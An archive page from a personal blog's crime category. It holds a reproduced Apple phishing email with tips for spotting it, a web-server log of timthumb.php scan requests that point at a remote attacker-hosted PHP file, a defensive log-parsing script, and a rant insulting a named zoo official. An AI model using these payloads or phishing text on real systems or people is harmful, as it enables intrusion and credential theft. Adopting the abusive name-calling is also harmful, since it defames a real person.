Blog

Category Archives: Crime


The ioscareteam phishing email

Posted in Apple, Computer Security, Crime, Internet, Privacy | September 19, 2014

I just got this very official-looking mail at my main address:

[Image: ioscareteam_email]

 

It reads like this:

Dear javi@lavandeira.net, (19 – September – 2014)

This message is to therefore warn you that your iCloud and Apple Account (javi@lavandeira.net) has been temporarily locked until we can validate your Apple Account details. This protective measure to secure your iCloud Account from unapproved usage. We apologise for any inconvenience you’ve been caused.

You will be unable to use iTunes or iCloud sync/backup or the iTunes/App Store & App Store until you verify your Apple Account ownership, we urge you to finish verification as soon as you can. Failure to validate your details within a 48 hours can cause termination of your Apple/iCloud ID to safeguard our system.

How to verify my Apple ID and restore access?
Just proceed to the link underneath to prove ownership of your Apple ID. Log-in in using your Appe/iCloud ID and password, then read the instructions.

> Certify My Apple Account

While using Apple devices and services, you’ll still sign in with your main email address as your Apple ID.

If you have questions and need help, visit the Apple Account Care site.

Thanks again,
Apple Account Maintenance Team

Case Support ID: #Y10FHK10419-EU10

It sounds very scary and serious. Should I click the link and log in with my Apple ID and password?

No.

This is just another phishing attempt. You are likely to receive a similar email. Do not, under any circumstances, click on the link and enter your details. I repeat: it’s just another phishing attempt.

Looking a bit closer we can see that the message’s reply-to header points to an address in the ioscareteam.co.uk domain. This domain doesn’t belong to Apple:

[Image: ioscareteam_replyto]

 

The link in the body of the message also points to the same domain. Just place the mouse pointer over the link (without clicking) and wait a couple seconds:

[Image: ioscareteam_mouseover]

They ask for your ‘Appe’ ID :-D

Clicking the link would take you to a very convincing fake Apple site that copies Apple’s real site. Looks like they even copied the country/language selection code.

However, this fake site will send your login details to the idiots who are trying to scam you:

[Image: ioscareteam_fakesite]

 

Summary: if you get an email like the one I got, ignore it.

Copenhagen zoo kills baby giraffe for fun, murderer still free

Posted in Animal rights, Crime, Pets, Society | February 11, 2014

Yesterday (February 9th 2014), the Copenhagen Zoo murdered Marius, an 18-month-old baby giraffe, by shooting him in the head. They then proceeded to dismember his corpse in front of the zoo visitors and feed the corpse to the lions.

[Image: Marius the giraffe]

Social networks and news sites are all echoing this crime. Just a few examples:

There was nothing wrong with Marius. He was a completely healthy animal. However, Bengt Holst, Director of Research and Conservation at Copenhagen Zoo, decided that Marius wasn’t genetically valuable enough. Other zoos offered to adopt Marius, but Holst declined the offers and decided that it would be a better show to kill the baby giraffe and carve the corpse in front of the public.

This is a photo of this fucking son of a bitch (it’s the dude on the left, the elephant is innocent):

[Image: bengt_holst_murderer]

In my opinion, this bastard, together with all the staff involved in the killing, should be immediately fired, forbidden to ever work with animals again, and put on trial for cruelty against animals. Under his direction, the Copenhagen Zoo sacrifices 20-30 animals per year.

There are several petitions online to get Holst fired or force him to resign. Here are two of them:

You should sign these, but you know how these things work: online petitions will most likely be ignored. Please share this in all your social networks. It may also be effective to write a letter directly to the Copenhagen Zoo and express your feelings about this killing. Here’s the address:

Copenhagen Zoo Administration
Roskildevej 32
2000 Frederiksberg
Denmark

WARNING: what follows are the photos of the killing and dismembering process. There is a lot of blood, so don’t read the rest of the post if you’re sensitive to this stuff.

 

Read more ›

Another script kiddy bruteforcing my password

Posted in Computer Security, Crime, Stupidity | May 2, 2013

Just as I finished the previous post, this pops up in my Varnish log:

[Image: script-kiddy]

A script kiddy using a host in Italy to bruteforce my WordPress password. What a waste of time and bandwidth.

My friend, please try something more sophisticated. I’m sure there are some holes on my system somewhere just waiting to be exploited.

 

One of today’s attacks to this web server

Posted in Computer Security, Crime, Technology | April 29, 2013

My web server was attacked by some guy in Germany last night. This happens several times a day, so it’s usually not a concern. This time it happened while I was monitoring the server, so I had some fun looking at what the attacker was trying to do.

When I’m working on the computer at home I usually have a terminal window open in the background. In this window I’m usually watching all requests to my web server in real time. Most of the time I don’t pay attention to it (it’s mostly search engines crawling my domains), but sometimes you catch something interesting. This is an example of the kind of attacks hitting every web server on the Internet many times a day.

I was having dinner when I saw several strange requests to the Varnish server in front of my backend web server:

85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:49 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:52 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/assets/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:54 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:55 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/extensions/auto-thumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:56 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:57 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/efrog/lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:58 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:59 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:00 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:01 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/fws/addons/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:03 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/library/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:05 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/helpers/timthumb/image.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:07 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:08 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/images/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:09 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:10 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/classes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:11 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:12 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/inc/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:14 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/include/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:16 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/functions/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:18 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:19 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:20 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:21 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/includes/timthumb/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:22 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:23 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/js/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3590 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:48:25 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//lib/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
[...additional lines omitted...]

(Actually, these logs are from the backend web server running Apache. I’m not storing the request log on the Varnish machine.)

This guy was obviously scanning the web server for a script called timthumb.php. A quick search on Google shows that there was indeed a security problem with older versions of this program. It was possible to trick it into downloading a file from an attacker’s host and saving it on the server, where it could later be executed in order to compromise the system (see this link for details).
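A scan like this is easy to pick out of an access log automatically. The following is an added example, not part of the original post: it groups requests whose src= parameter names a URL on a foreign host by client, and records whether any of them got a 2xx answer (a script that actually exists and needs checking). The site host name blog.example and the last sample line are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: capture client address, request target and status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

# First three lines copied from the log above; the last line is a constructed
# benign request from a documentation address.
SAMPLE_LOG = """\
85.214.110.68 - - [28/Apr/2013:22:47:48 +0900] "GET /wp-content/themes/Momento/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 400 300 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:49 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms//timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 301 20 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
85.214.110.68 - - [28/Apr/2013:22:47:50 +0900] "GET /wp-content/plugins/sitepress-multilingual-cms/timthumb.php?src=http://flickr.com.finnovations.de/parola.php HTTP/1.1" 404 3589 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]"
203.0.113.7 - - [28/Apr/2013:22:50:00 +0900] "GET /wp-content/uploads/photo.jpg HTTP/1.1" 200 51234 "-" "Mozilla/5.0"
"""

def remote_src_probes(log_text, own_hosts):
    """Per client: requests whose src= parameter points at a host we don't own."""
    report = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        path, _, query = target.partition("?")
        for src in parse_qs(query).get("src", []):
            host = (urlsplit(src).hostname or "").lower()
            if not host or host in own_hosts:
                continue  # relative path or an image on our own site
            entry = report.setdefault(client, {
                "requests": 0, "src_hosts": set(),
                "statuses": Counter(), "served": []})
            entry["requests"] += 1
            entry["src_hosts"].add(host)
            entry["statuses"][status] += 1
            if 200 <= status < 300:
                entry["served"].append(path)  # script exists: investigate
    return report
```

Note that the host in these requests, flickr.com.finnovations.de, only starts with flickr.com; the domain it actually belongs to is finnovations.de.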

Read more ›

ag0ny.com domain stolen

Posted in Computer Security, Crime, Internet, Personal | July 5, 2012

I just realized now that ag0ny.com, the domain name that I had been using for over 12 years, has been stolen. It’s pointing to a site in Russia and is hosting what appears to be a web aggregator.

I’m not really going to pursue this because the domain was worthless. I just had an email address there that I barely used. I kept it because from time to time some old friend or another sent me an email there. Plus, another person had an @ag0ny.com address on my server (JPGrobler: if you read this, now you know why your email address isn’t working anymore, I’m sorry).

So remember, if you want to contact me via email, my current email address is javi@lavandeira.net, not the old ag0ny@ag0ny.com.

ag0ny.com at the Internet Archive Wayback Machine, just for nostalgia.

Crazy woman illegally uses photographer’s photo, then makes legal threats

Posted in Crime, Fun, Internet, Photography, Politics, Stupidity | June 10, 2012

Imagine that you’re a professional photographer: you earn money by taking photos and licensing them to customers who want to use them. One day while browsing the web you find a web site using one of your commercial photos illegally. You wonder how many people are doing the same, so you run an online search and find out that there are many, many web sites using your photo illegally.

You want these people to stop using your work. You could try and contact each of the web site owners, but you know that it’s going to be pointless because most don’t have contact information, or the contact person doesn’t have access to the web code, or they will just ignore you. You decide to send DMCA takedown notices to the companies hosting each of these web sites, so they will get in touch with their customers and ask them to remove your photo from their web sites.

As a result of the DMCA takedown requests, many of the web sites remove your photo, others offer to license it, as they should have done from the beginning. It seems to be going well.

Until a crazy psychotic person enters the scene.

Read more ›